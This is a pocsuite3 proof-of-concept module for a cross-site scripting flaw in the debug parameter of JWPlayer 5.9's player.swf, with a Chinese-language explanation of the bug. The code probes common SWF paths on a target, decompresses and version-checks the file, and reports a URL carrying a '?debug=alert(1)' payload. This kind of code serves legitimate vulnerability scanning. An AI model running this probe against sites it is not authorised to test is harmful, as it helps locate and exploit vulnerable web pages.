""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger import struct import zlib import re from urllib import request class DemoPOC(POCBase): vulID = '0882' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2012-05-15' createDate = '2013-01-11' updateDate = '2012-01-11' references = ['http://www.wooyun.org/bugs/wooyun-2010-07166'] name = 'JWPlay 5.9 debug parameter Cross Site Scripting' appPowerLink = 'http://www.longtailvideo.com/' appName = 'JWPlayer' appVersion = '5.9#' vulType = 'Cross Site Scripting' desc = '''反编译player.swf,缺陷存在地方为:com\longtailvideo\jwplayer\\utils\Logger.as。send函数的_config.debug参数没有人过滤, 直接被ExternalInterface.call函数中去执行,ExternalInterface.call执行的是容器中的代码,在这里容器为HTML , 那么就会去调用JavaScript函数。攻击者可以构造跨站脚本传給_config.debug,最终导致跨站脚本漏洞。 ''' samples = [] install_requires = [''] def parse(self, swf_file): input = swf_file # swf文件名 need_close = False if hasattr(input, 'read'): # input.seek(0) pass else: input = open(input, 'rb') need_close = True def read_ui8(c): return struct.unpack('<B', c)[0] def read_ui16(c): return struct.unpack('<H', c)[0] def read_ui32(c): return struct.unpack('<I', c)[0] header = {} # Read the 3-byte signature field ff = input.read(3) signature = ''.join(map(lambda x:x.decode(), struct.unpack('<3c', ff))) # signature = struct.unpack('<3c',ff) if signature not in ('FWS', 'CWS'): raise ValueError('Invalid SWF signature: %s' % signature) # Compression header['compressed'] = signature.startswith('C') # Version header['version'] = read_ui8(input.read(1)) # File size (stored as a 32-bit integer) header['size'] = read_ui32(input.read(4)) # Payload buffer = input.read(header['size']) if header['compressed']: # Unpack the zlib compression de_buffer = buffer = zlib.decompress(buffer) return de_buffer def _verify(self): payloads = 
['/player.swf', '/jwplayer.swf', '/play.swf', '/swf/player.swf'] result = {} for path in payloads: payload = self.url + path try: contentType = requests.get(payload).headers.get("Content-Type") except Exception as e: contentType = '' if contentType == "application/x-shockwave-flash": r = request.urlopen(payload) swf = self.parse(r).decode('utf-8', 'ignore') m = re.findall('_version.*?([\d\.]+)', swf) if m: version = m[0].split('.') if int(version[0]) <= 5 and int(version[1]) <= 9 and "jwplayer" in swf: result['VerifyInfo'] = {} result['VerifyInfo'][ 'URL'] = payload + '?debug=alert(1)' result["VerifyInfo"]['Version'] = m[0] return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)
暂无官方解决方案
暂无防护方案